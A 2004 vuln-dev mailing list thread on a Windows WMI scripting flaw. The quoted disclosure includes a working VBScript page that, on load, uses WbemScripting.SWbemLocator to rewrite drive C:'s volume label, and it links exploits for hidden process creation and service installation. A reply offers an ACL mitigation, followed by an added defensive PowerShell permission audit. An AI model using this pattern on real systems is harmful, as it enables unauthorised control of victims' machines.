Vulnerability Development mailing list archives
[SPAM] RE: WbemScripting.SWbemLocator - createobject allows... EVERYTHING!
From: "jasonk" <jasonk () bluedevel com>
Date: Fri, 5 Mar 2004 10:05:23 +1100
Hi Bartosz,

If you run as an administrator, and allow unrestricted ActiveX access, this is no different to any other exploit. If the ActiveX was a trojan and you allowed full scripted access, there is the same effect.

However I imagine this can be used with some crossing the boundaries to My Computer, and then an attack effected much more easily than a "known file location" vuln.

For a temporary fix, under XP: Open Computer Management, Services and Applications -> right click WMI Control, choose Properties. Then, Deny "provider write" and "execute methods" for the cimv2 namespace.

This quite possibly WILL affect other applications on the computer, but should prevent this from occurring.

Otherwise, I don't know enough about WMI to be able to say how to disable certain applications. Anyone help?

jasonk
-----Original Message-----
From: Bartosz Kwitkowski [mailto:bartosz () wb pl]
Sent: Friday, 5 March 2004 8:24 AM
To: vuln-dev () securityfocus com
Subject: WbemScripting.SWbemLocator - createobject allows... EVERYTHING!

I would like to dedicate this discovery to Justyna.

WbemScripting.SWbemLocator - this object has access to WMI in Win XP (I have Prof fully patched), 2003, any NT? I think this vuln concerns all Windows where we can find WbemScripting.SWbemLocator.

I would not like to publish more exploits because of their dangerous use. More examples are at:
http://wb.pl/bartosz/wbem/process.htm - create process in hidden window
http://wb.pl/bartosz/wbem/installservice.htm - installs service
http://wb.pl/bartosz/wbem/changevolume.htm - changes volume of C:

HOME PAGE - http://wb.pl/bartosz/

example source:

<HTML>
<HEAD>
<TITLE>Change volume of disk</TITLE>
<SCRIPT LANGUAGE="VBScript">
' I would like to dedicate this discovery to Justyna.
Sub window_onload
    ' 3 = wbemImpersonationLevelImpersonate
    const impersonation = 3
    Set Locator = CreateObject("WbemScripting.SWbemLocator")
    Set Service = Locator.ConnectServer()
    Service.Security_.ImpersonationLevel = impersonation
    ' Fetch the Win32_LogicalDisk instance for C: and write back a new label
    Set Process = Service.Get("Win32_LogicalDisk=""C:""")
    Process.VolumeName = "bartosz kwitkowski"
    Process.Put_
end sub
</SCRIPT>
</HEAD>
<BODY>
I would like to dedicate this discovery to Justyna.
</BODY>
</HTML>

ANY QUESTIONS? ASK ME!
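The WMI Control dialog in the temporary fix above edits the access control list of the root\cimv2 namespace. As an added example (not code from either poster), this Windows PowerShell 5.1 script reports which trustees hold "Execute Methods" or "Provider Write", so the effect of a Deny entry can be checked before and after the change. The function names and the sample ACEs are constructed for illustration, and the live query relies on GetSecurityDescriptor, which is available on Windows Vista and later rather than on the XP system discussed in the thread.

```powershell
# Added example, not from the thread. Windows PowerShell 5.1; the live query needs elevation.
# Access-mask bits of the two namespace rights the post says to deny.
$WmiRights = [ordered]@{
    'Execute Methods' = 0x02   # WBEM_METHOD_EXECUTE
    'Provider Write'  = 0x10   # WBEM_WRITE_PROVIDER
}

function ConvertTo-WmiRightReport {
    # Emits one row per ACE (Win32_ACE shape) that carries either right.
    param([Parameter(Mandatory)][object[]]$Dacl)
    foreach ($ace in $Dacl) {
        $held = foreach ($name in $WmiRights.Keys) {
            if ($ace.AccessMask -band $WmiRights[$name]) { $name }
        }
        if (-not $held) { continue }   # ACE grants neither right, skip it
        [pscustomobject]@{
            Trustee   = @($ace.Trustee.Domain, $ace.Trustee.Name).Where({ $_ }) -join '\'
            AceType   = switch ($ace.AceType) { 0 { 'Allow' } 1 { 'Deny' } default { 'Audit' } }
            Inherited = [bool]($ace.AceFlags -band 0x10)   # INHERITED_ACE
            Rights    = $held -join ', '
        }
    }
}

function Get-WmiNamespaceRightReport {
    # Reads the live DACL of a namespace through its __SystemSecurity object.
    param([string]$Namespace = 'root\cimv2')
    $out = Invoke-WmiMethod -Namespace $Namespace -Path '__SystemSecurity=@' -Name GetSecurityDescriptor
    if ($out.ReturnValue -ne 0) { throw "GetSecurityDescriptor failed: $($out.ReturnValue)" }
    ConvertTo-WmiRightReport -Dacl $out.Descriptor.DACL
}

function New-SampleAce($Domain, $Name, $Mask, $Type) {
    # Builds a constructed stand-in for a Win32_ACE so the decoder runs offline.
    [pscustomobject]@{
        AccessMask = $Mask; AceType = $Type; AceFlags = 0
        Trustee    = [pscustomobject]@{ Domain = $Domain; Name = $Name }
    }
}

# Constructed sample DACL (not taken from a real system).
$sample = @(
    (New-SampleAce 'BUILTIN'      'Administrators'      0x6003F 0)
    (New-SampleAce 'NT AUTHORITY' 'Authenticated Users' 0x13    0)
    (New-SampleAce 'NT AUTHORITY' 'INTERACTIVE'         0x12    1)   # a Deny entry of the kind the post describes
    (New-SampleAce 'NT AUTHORITY' 'NETWORK SERVICE'     0x01    0)   # Enable Account only, filtered out
)
ConvertTo-WmiRightReport -Dacl $sample | Format-Table -AutoSize
# On a live host: Get-WmiNamespaceRightReport | Format-Table -AutoSize
```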
Current thread:
- WbemScripting.SWbemLocator - createobject allows... EVERYTHING! Bartosz Kwitkowski (Mar 04)
- [SPAM] RE: WbemScripting.SWbemLocator - createobject allows... EVERYTHING! jasonk (Mar 04)